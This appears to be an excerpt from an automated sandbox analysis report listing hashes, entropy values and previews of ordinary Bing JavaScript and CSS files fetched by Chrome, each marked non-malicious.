                                                                            SSDEEP:192:kCj8wH0f8w254RfGoLqrl5E5QeOcnGL0uaWLu15tcYJsdxzmv/exXzQUQqHGi/kZ:kvwH0n254xGoLqUVOcYdFQUU1P
                                                                            MD5:89C6BD181625110BF0E6A80D1DEE8173
                                                                            SHA1:CCFE3CB9187A9279B835A173F3F1E2638E7F5D5D
                                                                            SHA-256:1D943BF563627A4234B72B577D5B163F5E0C5B13497872908DC36464734A325F
                                                                            SHA-512:3F08C9090444802D4FFE937DF12BD37E96F4CB0CA0CDFEEC580776BF21B80D5E3DFEF0E218E7E0788F5161DCE081D11AA5B1F2273397375213A4DC4E1357BE9F
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var __assign=this&&this.__assign||function(){return __assign=Object.assign||function(n){for(var t,r,i=1,u=arguments.length;i<u;i++){t=arguments[i];for(r in t)Object.prototype.hasOwnProperty.call(t,r)&&(n[r]=t[r])}return n},__assign.apply(this,arguments)},__spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},LGUtility;(function(n){function ei(){sj_evt.bind(h,oi,!0);sj_evt.bind("bfbMainlineAnswerRemoved",vt,!0);sj_evt.bind("bfbPreExpanded",vt,!0);sj_evt.bind(ri,ci,!0)}function oi(n){var e,o,s;try{if(n[2]){var t=n[1],h=_ge(f(t)),r=h.getBoundingClientRect();fi&&!r.height?(e={name:"InvalidRender",message:"Widget did not have a height during render event"},st(t,e)):(o=u[t],u[t]={name:t,top:r.top+_w.scrollY,bottom:r.bottom+_w.scrollY},o?(s=pt(t),i.splice(s,1),yt(t)):yt(t))}et(n[1],!1)}catch(c){g=!0;st(n[1],c)}}functio
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):235
                                                                            Entropy (8bit):4.950408993882282
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXAZCNHYLGQRXCNHEqECNXmX7GMn5HbRAAOYKxHJaNxsiSC5T:2QAZbGQB+E9nRdmYgJaYZS
                                                                            MD5:72EB59B535349EC6A1F05224731E1141
                                                                            SHA1:888CCDFE928F7D14B2CCFA896BA0BF6E8BF9F602
                                                                            SHA-256:E4B8926B77EB745BA926945450AE3A54F6E6D7E91871E0CB29D96B8036ACB1E1
                                                                            SHA-512:EB7875A0AB1B99C20286C2A6A2057F600583824FF2E36F619202C0F0A413C883BE6C7FE9BF7C534D580260F53FB9308464FDB41BE36A15A1BF321B3DEDA6BF69
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){typeof ContextRegionPresent=="undefined"&&(ContextRegionPresent=!0);ContextRegionPresent&&sj_b!=null?(Lib.CssClass.remove(sj_b,"b_norr"),_w.sj_log&&sj_log("Info","HasRR","1")):sj_b!=null&&Lib.CssClass.add(sj_b,"b_norr")})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (440), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):440
                                                                            Entropy (8bit):5.056034868546527
                                                                            Encrypted:false
                                                                            SSDEEP:12:xPRBO8pH18IJCH1n+vCZrZ6EU2kvcBL3m:xPrO84OlaRIEt8cBS
                                                                            MD5:C90DB02AF84FAF8176BAEE9032CDFFF8
                                                                            SHA1:89E07ED70C29EBCF9D70D790B3995E16F0C0303C
                                                                            SHA-256:D9AE63FAA687EFC124F80B09666BA7C35E6B2A0537BEB91C17585176154BC0EA
                                                                            SHA-512:00D91908E1ABCCAD452E2E56C4491F3C5DEC36FC73FA29B4A18E246837CE33414D37EF1A016470477EDE8C25F5980A651B9BC0BCF85BBD43508ABDBEE942B168
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var UrlLib;(function(n){function t(n,t,i){var e=n.toLowerCase(),o=t.toLowerCase(),u="&"+o+"=",r=e.indexOf(u,0),f;return(r<0&&(u="?"+o+"=",r=e.indexOf(u,0)),r>=0)?(f=n.indexOf("&",r+1),f==-1&&(f=n.length),n.replace(n.substring(r+u.length,f),i)):_w.location.hash?n.substring(0,n.indexOf(_w.location.hash)).concat(n.indexOf("?")<0?"?":"&",t,"=",i)+_w.location.hash:n.concat(n.indexOf("?")<0?"?":"&",t,"=",i)}n.AddParam=t})(UrlLib||(UrlLib={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1627), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1627
                                                                            Entropy (8bit):4.998875607265554
                                                                            Encrypted:false
                                                                            SSDEEP:48:jFyYLf7xgFha0Ckw55C6t/1FuFF16x1+Yp0CRADVCvU+AP/rW:5yuIaIwLPy6/+SiJDa
                                                                            MD5:2F46CCDBF86244D2D1F9F79446474CD0
                                                                            SHA1:E603EF7F9652A064A8F31BEFE8490ED98104EB3B
                                                                            SHA-256:553635AFFF0292B5B30F9101074AF9BCF092AAF9A68BF43D20F59B28B1CBE8EE
                                                                            SHA-512:534C6EA51520724B8C0EB9C7A7C47E886E14DBC7DEA31481A68E5287C7179DB4421EE48ABE6B5731E6418A959748EA8BFB687371CB3A089CB3557357C4B85E76
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rb/5W/cc,nc/GZY3PyHImAjt56VIC2PBbIGPof4.css?bu=AcIX&or=w"
                                                                            Preview:.sw_ddbk,.sw_ddw,.sw_ddgn,.sw_st,.sw_sth,.sw_ste,.sw_st2,.sw_plus,.sw_tpcg,.sw_tpcw,.sb_clrhov,.sb_pagN,.sb_pagP,.sw_up,.sw_down,.b_expandToggle,.b_fLogo,.b_cm,.sw_lpoi,.actExpander span{position:relative;display:inline-block;overflow:hidden;direction:ltr}.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sb_pagN:after,.sb_pagP:after,.sw_down:after,.b_expandToggle:after,.b_fLogo:after,.b_cm:after,.sw_lpoi:after{display:inline-block;transform:scale(.5)}.sw_up:after{display:inline-block;transform:scale(.5,-.5) translateY(-20px)}.sw_tpcg,.b_expandToggle,.b_fLogo{display:block}.sw_st,.sw_sth,.sw_ste,.sw_st2{height:12px;width:12px}.sw_st:after{transform-origin:-68px -40px}.sw_st2:after{transform-origin:-124px -40px}.sw_sth:after{transform-origin:-152px -40px}.sw_ste:after{transform-origin:-96px -40px}.sw_ddbk,.sw_ddw,.sw_ddgn{height:4px;width:7px}.sw_ddbk:after,.sw_ddw:after{transfo
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (824), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):824
                                                                            Entropy (8bit):5.3314854117420465
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QQ3xVJjKVJ5o7VEioPVKofuVJ0PoRGP2QbAX53CO2Wd6o0YmmBM:AjWUJEhNZsvc8XgO2Wdh0Jm6
                                                                            MD5:3FF8EECB7A6996C1056BBE9D4DDE50B4
                                                                            SHA1:FDC4D52301D187042D0A2F136CEEF2C005DCBB8B
                                                                            SHA-256:01B479F35B53D8078BACA650BDD8B926638D8DAAA6EB4A9059E232DBD984F163
                                                                            SHA-512:49E68AA570729CC96ED0FD2F5F406D84869772DF67958272625CBA9D521CA508955567E12573D7C73D7E7727260D746B535C2CE6A3ACE4952EDF8FD85F3DB0DD
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function i(){var f="data-load",u,i;if(n&&!n.hasAttribute(f))try{if(_d.body.appendChild(n),typeof sj_gx=="function"){if(u=r.replace("%IG%",_G.IG).replace("%IID%",n.getAttribute("data-iid")).replace("%PARTNER%",n.getAttribute("data-ptn")).replace("%ENABLEP%",n.getAttribute("data-ep")).replace("%ICONPRELOADED%",n.getAttribute("data-iconpl")),n.setAttribute(f,"1"),i=sj_gx(),!i)return null;i.onreadystatechange=function(){typeof sj_appHTML=="function"&&4==i.readyState&&200==i.status&&sj_appHTML(n,i.responseText)};i.open("GET",t?SbiTst.at(u):u,!0);i.send(null)}}catch(e){}}function u(){if(n){var r=n.getAttribute("data-evt");r&&!t?sj_evt.bind(r,i,!0):i()}}var r="/images/sbi?mmasync=1&ig=%IG%&iid=%IID%&ptn=%PARTNER%&ep=%ENABLEP%&iconpl=%ICONPRELOADED%",n=_ge("sbicom_loader"),t=typeof SbiTst!="undefined";u()})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (836), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):836
                                                                            Entropy (8bit):4.9524053919246525
                                                                            Encrypted:false
                                                                            SSDEEP:12:IxUdVLYuO2t+bN41nebuxezeu77emOi9em6oemkxKhl4F+eMQ/Na:IU8Qv1neqx6jvI29OEl4D1a
                                                                            MD5:0FFD4EC439BE59D8ED6F3E76796D5381
                                                                            SHA1:9FD0479345A6566F8AA022A706F401694DDD260A
                                                                            SHA-256:1F196AA83E2B599AC87F394C906F048C861EBBCC377F476E4C6C0092304D5178
                                                                            SHA-512:2B0057EE50221C086F855DC3DBE53D04F255079F31FC36D2A81C0CE346B07337BB02A454C4064DEBA9A00B1B2A71BC93C0DCF0667D520B03638A0C7B3C5D81E8
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/n9BHk0WmVm-KoCKnBvQBaU3dJgo.css
                                                                            Preview:#b_header .b_searchboxForm #sb_search{margin:3px 4px 3px 3px;height:40px}#b_header .b_searchbox{border-radius:0;margin-left:-15px;margin-right:6px}#b_header #sb_form:not(.hassbi,.hasmic) .sb_clrhov,#b_header.b_focus #sb_form:not(.hassbi,.hasmic) .b_searchboxForm .sb_clrhov{margin-right:10px}.hassbi #sb_clt.sb_clrhov,.hasmic #sb_clt.sb_clrhov{margin-right:0}#b_header #sb_clt.sb_clrhov+#vkeyIcon{margin-left:-10px;margin-right:10px}#b_header .hassbi #sb_clt.sb_clrhov+#vkeyIcon,#b_header .hasmic #sb_clt.sb_clrhov+#vkeyIcon{margin-left:0;margin-right:0}#b_header .b_searchboxForm #sbiarea{margin-right:10px}#b_header .hasmic:not(.hassbi) .mic_cont.partner{margin-right:10px}div:not(#sb_search) .b_searchboxSubmit{margin-left:5px}#b_header .b_searchboxSubmit~#sw_clx{right:2px}#b_header .b_searchboxSubmit~.b_searchbox{margin-right:8px}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):208
                                                                            Entropy (8bit):5.168574997359601
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXTM3LVjJLVFl1TJc5qpjn6rI4AGBs+HV:2QMLVrhO5qhNNv+1
                                                                            MD5:A6F3B2A6EB5C698A83357F249E73D3A9
                                                                            SHA1:5C97EF08EEAEA712F711170E4F85A2E8DA864427
                                                                            SHA-256:0428A936E0137D674E2050C7ADDD6DDE4CFEC14F8EE849570FFEEE19410CEA2C
                                                                            SHA-512:BD262892D3AACBF37D83BCCC50C2C3563E3AA0569363CCD95A4A778A49AA139E241D005D66EE9B822B6B592033D2656B80B532CDC4CA2911E381E80D0368392B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function i(t){n&&(n.value==null||n.value.length==0)&&(t.preventDefault(),_w.open("/images/feed?FORM=STIVH0","_blank"))}var n=_ge("sb_form_q"),t=_ge("b-scopeListItem-images");sj_be(t,"click",i)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):270
                                                                            Entropy (8bit):4.899712383560328
                                                                            Encrypted:false
                                                                            SSDEEP:6:qOvsy8CemDvMX3idAb/pR7SAb9kvRqaI7sy8Q7sy8oRHsy8+cs:t+ydjIkvRrIXpRHNcs
                                                                            MD5:EB205AD97C03FF1F0FA4E8181A33ABFA
                                                                            SHA1:D2D31430F1BA4BD909684FC0FCB3C5D866CABBA1
                                                                            SHA-256:E0FC19557FC40013231E79254059B16AA64019202372077962AD0345F6434CD1
                                                                            SHA-512:C1793630AACBC4203F7911E41A07EF941BA96E0A6C20A13DCED139DEA3E2F6EDAD9CFE86001D467A58709D2F3441C6154C26670C163A5209F1DA1516869AA6E3
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var SHPromptForUserLocation;(function(n){function t(n,t){var i="AutoPrompt";SHwlochelper.log("DevLoc",i,"PromptDevLoc");SHgetlochelper.tgL(!0,null,t,i,n,null,null)}n.init=t})(SHPromptForUserLocation||(SHPromptForUserLocation={}));sj_evt.fire("promptForUserLocationInit")
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (3549), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):3549
                                                                            Entropy (8bit):5.65023100051052
                                                                            Encrypted:false
                                                                            SSDEEP:48:Ai4qSlMcqf3XC2g5rdvQoq435q4Szl2W5q4pzl2t5I5Yr5Ue:qqSpq/S2WrXqiq4Szlhq4pzl6OEB
                                                                            MD5:245217A65005C53A6B8FEFE10DAA3CFF
                                                                            SHA1:FAB80A6EBF449F719508F8EC60EC203287E9AC0E
                                                                            SHA-256:6FAB6885BD2FF6F5CB9895D82F0E4FC83EFBFBF546F506BBE5D8752A10365D08
                                                                            SHA-512:0F02427822CB16B1DC50A2E39B82080A424C53853F80C43FF8A6642F1AD5E2F8B4799CE7769A7F1717C5AA3D03035FB6475B380D1DE64892E2CB73B4C340D0F4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/-rgKbr9En3GVCPjsYOwgMofprA4.css
                                                                            Preview:#qs_searchBox{background-color:#fff;color:#444;text-align:center;display:flex;align-items:center;height:40px;max-width:300px;position:absolute;border-radius:20px;border:none;outline:0;text-decoration:none;box-shadow:0 0 0 1px rgba(0,0,0,.05),0 2px 3px 0 rgba(0,0,0,.1);margin-top:8px;display:none;cursor:pointer;font-weight:600;z-index:30009}#qs_searchBox:hover{box-shadow:0 0 0 1px rgba(0,0,0,.05),0 2px 4px 1px rgba(0,0,0,.14)}#qs_selectedText{order:2;margin:auto 12px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;max-width:258px}#qs_searchIconOuter{width:18px;height:18px;order:1;margin-left:12px;margin-right:0}#qs_searchIconInner{display:inline-flex;width:45px;height:45px;background-repeat:no-repeat;transform-origin:top right;transform:translate(-2px,-2px)}#qs_copyBox,#qs_chatBox{text-align:center;display:flex;align-items:center;height:40px;max-width:300px;position:absolute;border:none;outline:0;text-decoration:none;box-shadow:0 0 0 1px rgba(0,0,0,.05),0 2px 3px 0 rgba(0,0,0,
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (440), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):440
                                                                            Entropy (8bit):5.056034868546527
                                                                            Encrypted:false
                                                                            SSDEEP:12:xPRBO8pH18IJCH1n+vCZrZ6EU2kvcBL3m:xPrO84OlaRIEt8cBS
                                                                            MD5:C90DB02AF84FAF8176BAEE9032CDFFF8
                                                                            SHA1:89E07ED70C29EBCF9D70D790B3995E16F0C0303C
                                                                            SHA-256:D9AE63FAA687EFC124F80B09666BA7C35E6B2A0537BEB91C17585176154BC0EA
                                                                            SHA-512:00D91908E1ABCCAD452E2E56C4491F3C5DEC36FC73FA29B4A18E246837CE33414D37EF1A016470477EDE8C25F5980A651B9BC0BCF85BBD43508ABDBEE942B168
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/ieB-1wwp68-dcNeQs5leFvDAMDw.js
                                                                            Preview:var UrlLib;(function(n){function t(n,t,i){var e=n.toLowerCase(),o=t.toLowerCase(),u="&"+o+"=",r=e.indexOf(u,0),f;return(r<0&&(u="?"+o+"=",r=e.indexOf(u,0)),r>=0)?(f=n.indexOf("&",r+1),f==-1&&(f=n.length),n.replace(n.substring(r+u.length,f),i)):_w.location.hash?n.substring(0,n.indexOf(_w.location.hash)).concat(n.indexOf("?")<0?"?":"&",t,"=",i)+_w.location.hash:n.concat(n.indexOf("?")<0?"?":"&",t,"=",i)}n.AddParam=t})(UrlLib||(UrlLib={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (981), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):981
                                                                            Entropy (8bit):4.914269555028415
                                                                            Encrypted:false
                                                                            SSDEEP:24:+vhK3MxsY1ExTUyvVJVqVdWVso4P8wVs4hQC6RZnTJKJZVUVB1R4b8W:2zsYaxTBVJVqVdWVdBwVpQTEJZVUVBO
                                                                            MD5:BBD28BC6418D626E07E1CF1F42CCD537
                                                                            SHA1:BCA836882798333A3009B832A9C643FD435B249F
                                                                            SHA-256:3FEFB92E68C421C4663BF0062C90DF1421BE56C94CFAAB7153D6F0B1C318AA91
                                                                            SHA-512:F3FED1CC8864358479F2DA66A79F3C51CDB4BB799913E28D6721AB9DB2B7E0ACC91D823850E95DAD15964A42B146BEBE8B4C192A25FED47D14866114B469AF27
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:"https://r.bing.com/rb/3T/cc,nc/FtH7yWHWJjaF_w_8GhgR7aWXHVM.css?bu=AtkD-gM&or=w"
                                                                            Preview:.sb_pagP_bp:after{transform-origin:-430px 0}.sb_pagP_bp:hover:after,.sb_pagP_bp:active:after,.sb_pagP_bp:focus:after{transform-origin:-514px 0}.sb_pagN_bp:after{transform-origin:-430px 0}.sb_pagN_bp:hover:after,.sb_pagN_bp:active:after,.sb_pagN_bp:focus:after{transform-origin:-514px 0}.sb_inactP:after,.sb_inactP:hover:after{transform-origin:-598px 0}.b_pag a{display:block;text-align:center}.b_pag a.sb_bp{min-width:40px;margin-right:20px;line-height:42px}.b_pag a.sb_pagN,.b_pag a.sb_pagP{border:0;padding:1px}.b_pag a.sb_pagN_bp,.b_pag a.sb_pagP_bp{width:40px;height:40px;margin-top:0}.b_pag a.sb_bp.sb_inactP{min-width:38px}.b_pag a.sb_pagP_bp.sb_inactP{width:38px}.b_pag a.b_roths{transform:rotate(180deg)}.b_pag .sw_prev,.b_pag .sw_next{margin:2px}@media screen and (forced-colors:active){.sb_pagN:after,.sb_pagP:after{content:""}li.b_pag a.sb_pagN,li.b_pag a.sb_pagP{width:auto}li.b_pag a.b_roths{transform:rotate(0deg)}.b_pag .sw_next,.b_pag .sw_prev{display:block}}z{a:1}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):272
                                                                            Entropy (8bit):5.048105561416113
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXTMD6REydKENouDlKqWfUyoI6/j9/BlSkpxs+lZUMYIXM6rIriT:2QqgG0oG3WfU9Iij9/rq+dXMN2T
                                                                            MD5:05E94F00F716C13C6D71E3DDBAAD0731
                                                                            SHA1:C3322A4BF0E23E719E483B6271BCD5A85C484870
                                                                            SHA-256:8FAA33F01D5CFC08518C2CB9FE1386C2EE50F53B7FF456E54038FB702BA8DCAB
                                                                            SHA-512:BD93FFF213B526B76354C059701805FC89FD222757D7F03929BF0FEC5530BD3BBF88CDFEB96B24C32A8C2850319DA9E76CF731E93CF37DE2B6FD3E80980B16F7
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/wzIqS_DiPnGeSDticbzVqFxISHA.js
                                                                            Preview:(function(){function i(){var t=_ge("b_header");t&&(t.className=t.classList.contains("b_2ndscope")?"b_focus b_2ndscope":"b_focus");n&&(typeof Log!="undefined"&&Log&&Log.Log&&Log.Log("SpSbInteract","AS","PerfInst",!1),n=!1)}var t=_ge("sb_form_q"),n=!0;sj_be(t,"focus",i)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (924), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):924
                                                                            Entropy (8bit):5.195012633286773
                                                                            Encrypted:false
                                                                            SSDEEP:24:rVnoyfEzPHQFvG99rynERM93YGxSN+/sKE3p5vyNAM:rVnoyCkKgnCM9eBKE55vyj
                                                                            MD5:47442E8D5838BAAA640A856F98E40DC6
                                                                            SHA1:54C60CAD77926723975B92D09FE79D7BEFF58D99
                                                                            SHA-256:15ED1579BCCF1571A7D8B888226E9FE455ACA5628684419D1A18F7CDA68AF89E
                                                                            SHA-512:87C849283248BAF779FAAB7BDE1077A39274DA88BEA3A6F8E1513CB8DCD24A8C465BF431AEE9D655B4E4802E62564D020F0BB1271FB331074D2EC62FC8D08F63
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/VMYMrXeSZyOXW5LQn-ede-_1jZk.js
                                                                            Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))};(function(){function n(n){for(var r=[],i=1;i<arguments.length;i++)r[i-1]=arguments[i]}function u(n,t){for(var u=[],r=2;r<arguments.length;r++)u[r-2]=arguments[r];typeof Log!="undefined"&&Log&&Log.Log&&Log.Log.apply(Log,__spreadArray([i,n,t,!1],u,!1))}var t="acclink",i="acclink";if(sj_evt){sj_evt.bind("acclink:updated",function(t){if(t&&t.length>=2){var i=t[1],f=i.IsTenantAllowAccountLink,e=i.HasLinkedAccount;n("fire loadIdLinkIcon with acclink:updated ",t[1]);r(f,e);u("loadIdLinkIcon","load IdLinkIcon","params",t[1])}},1);function r(t,i){var r=_ge("id_linkicon");r&&(t&&i?(r.style.display="inline-block",n("show id link icon")):(r.style.display="none",n("hide id link icon")))}}})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):242
                                                                            Entropy (8bit):4.86807996961474
                                                                            Encrypted:false
                                                                            SSDEEP:6:A909cpDUDUBDhR9c2p83QVhXANO09c8k9Au9c2pHn:AocpwDUBhfc2W3YXANvcpiMc2Bn
                                                                            MD5:6C2C6DB3832D53062D303CDFF5E2BD30
                                                                            SHA1:B7A064A64CEAE5C9009EF7D6D8F63B90D3933C9D
                                                                            SHA-256:06B77EE16A2CD34ACD210B4F2B6E423762EA8874BB26AE5A37DB9DD01A00FF70
                                                                            SHA-512:BC2D115B53035B700D727AF9D7EFAF32DD2A39A2344F3F5FA1A82586BE849EC7803E8320661E66AB7DD2A17E64B7897E95BBD84502B91997FA46EBA4E67E8C7D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:function RewardsReportActivity(n){window.sj_rra&&sj_rra(n)}(function(){RewardsReportActivity(document.URL);sj_evt&&sj_evt.bind("acclink:updated",function(){typeof RewardsReportActivity!="undefined"&&RewardsReportActivity(document.URL)},1)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):124
                                                                            Entropy (8bit):5.138667207227135
                                                                            Encrypted:false
                                                                            SSDEEP:3:zZ2PWcUAZ27ZmHnZ2PWcP5C7mXLOcrFw8gMCMY:zZ+2wnZ85C7mic+QY
                                                                            MD5:766C2792A170EA796B3FA470E8F82AA4
                                                                            SHA1:3BEF25D160109215FCB550B19412463D06394D5C
                                                                            SHA-256:8A747E79DD649D36BF2E67BC38EA0C91217A3086AD08D170F18229E15916D74E
                                                                            SHA-512:62EFE160A958330E9201D4DB636C62BA4373A957C9D0796F54281EB769C066E8ADE173877E8D4716595FCD76D9C1129DA4AA3D29F200D5EA9B0FD373ABDAE705
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/O-8l0WAQkhX8tVCxlBJGPQY5TVw.css
                                                                            Preview:.b_searchboxSubmit{background-repeat:no-repeat}.b_searchboxSubmit{background-image:url(/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png)}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1274), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1274
                                                                            Entropy (8bit):5.30620342636407
                                                                            Encrypted:false
                                                                            SSDEEP:24:+Fq4YTsQF61KWllWeM2lSoiLKiUfpIYdk+fzWPn8X0kdo6QBUf4JPwk:+FGF6UYXEBi9k5P8OPUY
                                                                            MD5:A969230A51DBA5AB5ADF5877BCC28CFA
                                                                            SHA1:7C4CDC6B86CA3B8A51BA585594EA1AB7B78B8265
                                                                            SHA-256:8E572950CBDA0558F7B9563CE4F5017E06BC9C262CF487E33927A948F8D78F7F
                                                                            SHA-512:F45B08818A54C5FD54712C28EB2AC3417EEA971C653049108E8809D078F6DD0560C873CEB09C8816ECD08112A007C13D850E2791F62C01D68518B3C3D0ACCCEB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var Identity=Identity||{};(function(n,t,i,r,u,f,e){e.wlProfile=function(){var r=sj_cook.get,u="WLS",t=r(u,"N"),i=r(u,"C");return i&&e.wlImgSm&&e.wlImgLg?{displayName:t?t.replace(/\+/g," "):"",name:n(t.replace(/\+/g," ")),img:e.wlImgSm.replace(/\{0\}/g,f(i)),imgL:e.wlImgLg.replace(/\{0\}/g,f(i)),idp:"WL"}:null};e.headerLoginMode=0;e.popupAuthenticate=function(n,i,r){var o,u,h,c,v=sb_gt(),l=Math.floor(v/1e3).toString(),s="ct",a=new RegExp("([?&])"+s+"=.*?(&|$)","i");return n.toString()==="WindowsLiveId"&&(o=e.popupLoginUrls,u=o[n],u=u.match(a)?u.replace(a,"$1"+s+"="+l+"$2"):u+"?"+s+"="+l,e.popupLoginUrls.WindowsLiveId=u),(o=e.popupLoginUrls)&&(u=o[n]+(i?"&perms="+f(i):"")+(r?"&src="+f(r):""))&&(h=e.pop(u))&&(c=setInterval(function(){h.closed&&(t.fire("id:popup:close"),clearInterval(c))},100))};e.pop=function(n){return r.open(n,"idl","location=no,menubar=no,resizable=no,scrollbars=yes,status=no,titlebar=no,toolbar=no,width=1000,height=620")};var s=u("id_h"),o=u("id_l"),h="click";t.bind("o
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):180
                                                                            Entropy (8bit):4.84464676577132
                                                                            Encrypted:false
                                                                            SSDEEP:3:8GNLnLDvWZGQANliKmYYuIeIyVKseByNYoBULeVBMaCe/NmyqHRCA1WRfVeBXJn:jLnvW4bNlpmZujIygsD+oBSKBMJeFmKa
                                                                            MD5:C38ED67C584F412D68541CCDBA3BF2A8
                                                                            SHA1:8947287B32583ADD11390F318983A6FFB7BDE9A0
                                                                            SHA-256:20ECF53C4DAFE3BCF8A9DDFB4246AB41DF880AA2A7475397C7AEB435053495F9
                                                                            SHA-512:002CB6402BE416C94B469A2607B62D9D2EC091E8F7ECAAE6C8AA25B22A4523F933F09218DC7DEA9CC4EAFB4678B80604CDA611B474ADD539933AF07AF35CF537
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/iUcoezJYOt0ROQ8xiYOm_7e96aA.css
                                                                            Preview:.b_mapImg .cico,.sa_as .cico,#reviews_tp .cico{border-radius:0}.cico{overflow:hidden;border-radius:6px}.clpimg,.clpdimg,.bsimg{width:100%}.cico picture{line-height:0;display:block}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1219), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1219
                                                                            Entropy (8bit):5.052686280897065
                                                                            Encrypted:false
                                                                            SSDEEP:24:2K3LxZxoVHJraQURpQsnMioY9unM4Q/BmnOBYHBT6Meox85jqvM1X7Q:rtZfDRp+i7AMaT6MeoxwjqvMd7Q
                                                                            MD5:8A60B77B4399CE7756D322EF8E6B9FDB
                                                                            SHA1:11CD6912516E16F4BCD4DEF575A0C39B41E7C69B
                                                                            SHA-256:5B54ABE15108A53F051BBEC0889206BBE1B80F3DB2163B2B40189458AEF98250
                                                                            SHA-512:5105121299EC2D774A70AD53895B537ED6573F87DB0FDA9E03534A384834C3D661B518B0AAC603389CCA23C65D6F210429761526A58AECEE61D45A58A2F61457
                                                                            Malicious:false
                                                                            Reputation:low
